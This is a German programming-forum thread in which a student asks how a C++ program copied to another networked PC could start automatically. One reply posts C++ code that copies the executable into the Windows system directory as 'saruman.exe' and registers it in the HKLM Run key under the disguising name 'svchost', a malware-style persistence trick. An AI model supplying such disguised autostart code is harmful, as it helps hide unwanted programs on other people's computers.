Programm automatisch starten!

Hallo,
also ich lerne gerade in der Schule c++ und wir haben da nun ne exe geschrieben in der im cmd Fenster ein Hallo Welt kommt :).
Ok das war ja no ned so schwer, nun hat der Lehrer gsagt:
- Übers Netzwerk sollen wir die exe auf einen bestimmten Computer geben, ok also:
--> Ausführe, \\ip, ordner is da, rein damit.

So das war noch ned so schwer.
Und dann sagte er wir sollen uns Gedanken darüber machen wie und ob es überhaupt möglich is, dass diese dann automatisch startet.
Naja ich denk ma Viren und so starten ja auch automatisch, aber ka wie das gehn kann, gibts da vielleicht nen Tutorial oder so?

Danke für eure Hilfe :).

mfg,
Argre

Die Anwending kann sich doch in den Autostart schreiben, hier ein Beispiel:

Code:
int test_key()
{
     char system_path[1000], *full_path;
     HKEY hkey;
     int check, test, reg_key;
     char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;

test = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_QUERY_VALUE, &hkey);

if(test != ERROR_SUCCESS)
     {
             check = 1;
             return check;
     }

/*
     ERROR_MORE_DATA       234L
     ERROR_SUCCESS         0L
     ERROR_FILE_NOT_FOUND  2L
     */

reg_key=RegQueryValueEx(hkey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=ERROR_SUCCESS)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==ERROR_SUCCESS)
        check=0;

RegCloseKey(hkey);
    return check;   

}

int create_key()
{
    int reg_key, check;
    HKEY hkey;

char  *path, system[255], current[255];

GetSystemDirectory(system, sizeof(system));
     path = strcat(system, "\\saruman.exe");
     GetModuleFileName(NULL, current, sizeof(current));
     CopyFile(current, path, 0);  

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;

return check;
}

schau dir mal die win-api und speziell die registry an...

Wann solle es das machen? Dafür muss die Datei zumindest 1 mal aufgerufen werden, damit c++ code ausgeführt werden kann. ^^
Ich glaube die Fragestellung war eher: Wie geht das, wenn ich hier an meinem PC sitze, keinen direkten Zugriff auf den Ziel-PC hab und der Ziel-PC von sich aus NICHT aktiv wird.

Ich kann mich Easyrider nur anschließen.

Noja, wenn man Hallo Welt programmiert ist es wohl etwas früh sich mit Lücken im SMB zu befassen, nicht?

Sollte die Frage gelautet haben "Wie kannst du die Datei auf deinem eigenen PC autmatisch starten lassen?" dann kopier die exe in den Autostart Ordner. Oder wenigstens eine Verknüpfung zur Datei.

Hallo,
also es war so wie Extinction schrieb:

Ich glaube die Fragestellung war eher: Wie geht das, wenn ich hier an meinem PC sitze, keinen direkten Zugriff auf den Ziel-PC hab und der Ziel-PC von sich aus NICHT aktiv wird.

Aber Danke an alle die mir gholfen haben :), werde mir mal win-api und speziell die registry ansehen :).

Danke!

mfg,
Argre

Zurück
Oben